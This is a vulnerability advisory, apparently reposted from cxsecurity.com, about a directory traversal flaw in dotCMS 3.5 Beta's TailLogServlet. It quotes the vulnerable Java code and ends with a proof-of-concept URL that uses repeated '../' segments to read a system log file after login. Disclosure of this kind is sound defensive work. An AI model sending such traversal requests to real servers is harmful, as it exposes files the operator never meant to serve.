DotCMS 3.5 Beta Directory Traversal

Published
Credit
Risk
2016.04.12
Piaox From Pingan Product Safety Group
Medium
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

Advisory: DotCMS Directory traversal vulnerability

Author: Piaox From Pingan Product Safety Group

Email: xiongyaofu351@pingan.com.cn

Affected Version: dotCMS 3.5 Beta(the latest version)



==========================

Vulnerability Description

Recetly, I found a Directory traversal vulnerability in ?DotCMS'
program, DotCMS is widely used in many companies.



Vulnerable file is: ?com.dotmarketing.servlets.taillog.TailLogServlet.class?

File file = *null*;

String tailLogLofFolder = *Config*.*getStringProperty*(
"TAIL_LOG_LOG_FOLDER", "./dotsecure/logs/");

*try*

{

*if* (!tailLogLofFolder.endsWith(File.separator)) {

tailLogLofFolder = tailLogLofFolder + File.separator;

}

file = *new* File(*FileUtil*.*getAbsolutlePath*(tailLogLofFolder +
fileName));

}

*catch* (Exception e)

{

*Logger*.*error*(getClass(), "unable to open log file '" +
tailLogLofFolder + fileName + "' please set the config variable
TAIL_LOG_LOG_FOLDER correctly");

}

*if* ((file == *null*) || (!file.exists()))

{

response.sendError(403);

*AdminLogger*.*log*(*TailLogServlet*.*class*, "service", "Someone
tried to use the TailLogServlet to display a file not in the logs directory"
);

*return*;

}

String regex = *Config*.*getStringProperty*("TAIL_LOG_FILE_REGEX");

//WEB-INF/classes/dotmarketing-config.properties:TAIL_LOG_FILE_REGEX=.*\.log$|.*\.out$

*if* (!*UtilMethods*.*isSet*(regex)) {

regex = "!.*";

}

*if* (!Pattern.compile(regex).matcher(fileName).matches()) {

//Only detects whether the file extension .log end,lead ?caused Directory
traversal vulnerability.

*return*;

}

response.setContentType("text/html;charset=UTF-8");



ServletOutputStream out = response.getOutputStream();



out.print("<html><head><title>dotCMS Log</title><style
type='text/css'>@import '/html/css/dot_admin.css';</style><script>var
working =false;function
doS(){if(!working){working=true;if(parent.document.getElementById('scrollMe').checked){dh=document.body.scrollHeight;ch=document.body.clientHeight;if(dh>ch){moveme=dh-ch;window.scrollTo(0,moveme);}}working=false;}}</script></head><body
class='tailerBody'>");



out.flush();



*Tailer* tailer = *null*;

*long* startPosition = file.length() - 5000L < 0L ? 0L : file.length()
- 5000L;



*MyTailerListener* listener = *new* MyTailerListener(*null*);

listener.*handle*("Tailing " + fileName);

listener.*handle*("----------------------------- ");

tailer = *new* *Tailer*(file, listener, 1000L);

tailer.*setStartPosition*(startPosition);

*MyTailerThread* thread = *new* *MyTailerThread*(tailer);



String name = *null*;

*for* (*int* i = 0; i < 1000; i++)

{

name = "LogTailer" + i + ":" + fileName;

Thread t = *ThreadUtils*.*getThread*(name);

*if* (t == *null*) {

*break*;

}

*if* (i > 100) {

*throw* *new* ServletException("Too many Logger threads");

}

}



==========================

POC && EXP

==========================

1. Login

2.
http://localhost:8080/dotTailLogServlet/?fileName=../../../../../../../../var/log/system.log



See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com